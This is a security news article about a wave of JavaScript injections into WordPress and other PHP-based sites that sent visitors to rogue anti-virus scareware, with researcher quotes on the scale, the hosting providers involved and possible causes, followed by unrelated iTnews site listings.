Widespread attacks continue against WordPress sites

Powered by SC Magazine
 

Other sites now targeted as well.

A new campaign to hack WordPress websites and serve rogue anti-virus is underway, according to security researchers.

In addition to WordPress blogs, websites created with other PHP-based platforms, including the Zen Cart eCommerce solution, are affected by the attacks, Regina Smola, co-founder of WPSecurityLock, told SCMagazineUS.com.

Attackers injected malicious JavaScript into the sites, causing visitors to be redirected to scareware domains that attempted to trick users into installing a virus, she said.

Tens of thousands of legitimate sites are believed to be affected.

When visiting one of the compromised sites, users of Internet Explorer or Chrome were redirected to the rogue AV, Smola said. Firefox users were not affected.

Having an up-to-date anti-virus program would block the scareware program from running, she said.

David Dede, lead security researcher at malware detection solutions provider Sucuri Security, told SCMagazineUS.com that all PHP files on affected sites were modified. The malicious JavaScript loaded rogue anti-virus malware from two domains in this case: indesignstudioinfo.com/ls.php and zettapetta.com/js.php.

“The pain to the users is that every single file got infected,” Dede said. “On a normal WordPress site, it is around 1,000 files to clean.”

The affected sites were hosted by a number of US-based ISPs, including DreamHost, GoDaddy, Bluehost, Media temple and HostGator, the researchers said. Since all the hacked sites were utilising shared web hosting providers, analysts did not have access to system logs and were not able to conduct a full forensic investigation.

As a result, experts are unsure how the sites were compromised. Attackers may have used stolen FTP or WordPress passwords, launched a brute-force attack against the passwords, or leveraged a vulnerability in either WordPress itself or a WordPress plug-in, Dede wrote in a blog post.

Todd Redfoot, CISO of GoDaddy, said in a statement sent to WPSecurityLock that the attack was targeting websites running outdated versions of WordPress and other online applications. However, a number of sites running the latest version of Wordpress also had been compromised, Dede said.

It does not appear that attackers took advantage of an unknown vulnerability in WordPress because, if so, the exploits would be more widespread, he added.

Smola said a brute-force attack against passwords is possible.

“I have found that 99 percent of the sites that we have seen and fixed had very weak passwords to both their FTP and their hosting accounts,” she said.

Others have speculated that the attack may have leveraged a zero-day vulnerability in phpMyAdmin, an open-source tool that allows users to interact with their MySQL databases, Dede said. But there is no evidence of this.

WPSecurityLock has posted instructions for removing the infection, and Sucuri Security has released scripts to automate the process.

This is just the latest wave of attacks against WordPress websites that have been ongoing for the past month, Smola said.

In a previous attack, launched earlier this month, more than 40,000 WordPress sites were affected, she said.

And in April, reports surfaced that some WordPress sites had been compromised to direct users to malicious websites. In that case, the targeted sites appeared to be hosted by Network Solutions. WordPress creator Matt Mullenweg subsequently pinned the blame on improperly configured web servers, which he said are the responsibility of the hosting provider.

"WordPress, like all other web applications, must store database connection info in clear text," Mullenweg said. "Encrypting credentials doesn't matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system — like they appeared to have in this case — it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?"

Network Solutions representatives disagreed.

"This issue is not isolated to Network Solutions, nor is it a Network Solutions server issue," a spokeswoman told SCMagazineUS.com in an email. "We're working with the experts in the WordPress community and understand it is an issue with a WordPress plug-in or theme and it is impacting a number of websites that are hosted on various hosting platforms."

The latest spate of WordPress attacks may be linked to recently compromised websites belonging to the U.S. Department of Treasury that were attempting to exploit client-side vulnerabilities to serve malware, independent analyst Dancho Danchev said in a blog post.

"The hosting company used by the [Treasury Department's] Bureau of Engraving and Printing had an intrusion, and as a result of that intrusion, numerous websites were affected," he said a statement emailed to SCMagazineUS.com.

The Treasury Department did not name the hosting provider in the statement, but researchers said it was Network Solutions.

See original article on scmagazineus.com

Copyright © SC Magazine, US edition


 
 
 
Top Stories
Frugality as a service: the Amazon story
Behind the scenes, Amazon Web Services is one lean machine.
 
Negotiating with the cloud email megavendors
[Blog post] Lessons from Woolworths’ mammoth migration.
 
Qld govt to move up to 149k staff onto Office 365
Australia's largest deployment, outside of the universities.
 
 
Sign up to receive iTnews email bulletins
   FOLLOW US...

Latest VideosSee all videos »

The great data centre opportunity on Australia's doorstep
The great data centre opportunity on Australia's doorstep
Scott Noteboom, CEO of LitBit speaking at The Australian Data Centre Strategy Summit 2014 in the Gold Coast, Queensland, Australia. http://bit.ly/1qpxVfV Scott Noteboom is a data centre engineer who led builds for Apple and Yahoo in the earliest days of the cloud, and who now eyes Asia as the next big opportunity. Read more: http://www.itnews.com.au/News/372482,how-do-we-serve-three-billion-new-internet-users.aspx#ixzz2yNLmMG5C
Interview: Karl Maftoum, CIO, ACMA
Interview: Karl Maftoum, CIO, ACMA
To COTS or not to COTS? iTnews asks Karl Maftoum, CIO of the ACMA, at the CIO Strategy Summit.
Susan Sly: What is the Role of the CIO?
Susan Sly: What is the Role of the CIO?
AEMO chief information officer Susan Sly calls for more collaboration among Australia's technology leaders at the CIO Strategy Summit.
Meet the 2014 Finance CIO of the Year
Meet the 2014 Finance CIO of the Year
Credit Union Australia's David Gee awarded Finance CIO of the Year at the iTnews Benchmark Awards.
Meet the 2014 Retail CIO of the Year
Meet the 2014 Retail CIO of the Year
Damon Rees named Retail CIO of the Year at the iTnews Benchmark Awards for his work at Woolworths.
Robyn Elliott named the 2014 Utilities CIO of the Year
Robyn Elliott named the 2014 Utilities CIO of the Year
Acting Foxtel CIO David Marks accepts an iTnews Benchmark Award on behalf of Robyn Elliott.
Meet the 2014 Industrial CIO of the Year
Meet the 2014 Industrial CIO of the Year
Sanjay Mehta named Industrial CIO of the Year at the iTnews Benchmark Awards for his work at ConocoPhillips.
Meet the 2014 Healthcare CIO of the Year
Meet the 2014 Healthcare CIO of the Year
Greg Wells named Healthcare CIO of the Year at the iTnews Benchmark Awards for his work at NSW Health.
Meet the 2014 Education CIO of the Year
Meet the 2014 Education CIO of the Year
William Confalonieri named Healthcare CIO of the Year at the iTnews Benchmark Awards for his work at Deakin University.
Meet the 2014 Government CIO of the Year
Meet the 2014 Government CIO of the Year
David Johnson named Government CIO of the Year at the iTnews Benchmark Awards for his work at the Queensland Police Service.
Q and A: Coalition Broadband Policy
Q and A: Coalition Broadband Policy
Malcolm Turnbull and Tony Abbott discuss the Coalition's broadband policy with the press.
AFP scalps hacker 'leader' inside Australia's IT ranks.
AFP scalps hacker 'leader' inside Australia's IT ranks.
The Australian Federal Police have arrested a Sydney-based IT security professional for hacking a government website.
NBN Petition Delivered To Turnbull's Office
NBN Petition Delivered To Turnbull's Office
UTS CIO: IT teams of the future
UTS CIO: IT teams of the future
UTS CIO Chrissy Burns talks data.
New UTS Building: the IT within
New UTS Building: the IT within
The IT behind tomorrow's universities.
iTnews' NBN Panel
iTnews' NBN Panel
Is your enterprise NBN-ready?
Introducing iTnews Labs
Introducing iTnews Labs
See a timelapse of the iTnews labs being unboxed, set up and switched on! iTnews will produce independent testing of the latest enterprise software to hit the market after installing a purpose-built test lab in Sydney. Watch the installation of two DL380p servers, two HP StoreVirtual 4330 storage arrays and two HP ProCurve 2920 switches.
The True Cost of BYOD
The True Cost of BYOD
iTnews' Brett Winterford gives attendees of the first 'Touch Tomorrow' event in Brisbane a brief look at his research into enterprise mobility. What are the use cases and how can they be quantified? What price should you expect to pay for securing mobile access to corporate applications? What's coming around the corner?
Ghost clouds
Ghost clouds
ACMA chair Chris Chapman says there is uncertainty over whether certain classes of cloud service providers are caught by regulations.
Was the Snowden leak inevitable?
Was the Snowden leak inevitable?
Privacy experts David Vaile (UNSW Cyberspace Law and Policy Centre) and Craig Scroggie (CEO, NextDC) claim they were not surprised by the Snowden leaks about the NSA's PRISM program.
Latest Comments
Polls
Which bank is most likely to suffer an RBS-style meltdown?





   |   View results
ANZ
  20%
 
Bankwest
  9%
 
CommBank
  11%
 
National Australia Bank
  17%
 
Suncorp
  24%
 
Westpac
  19%
TOTAL VOTES: 1440

Vote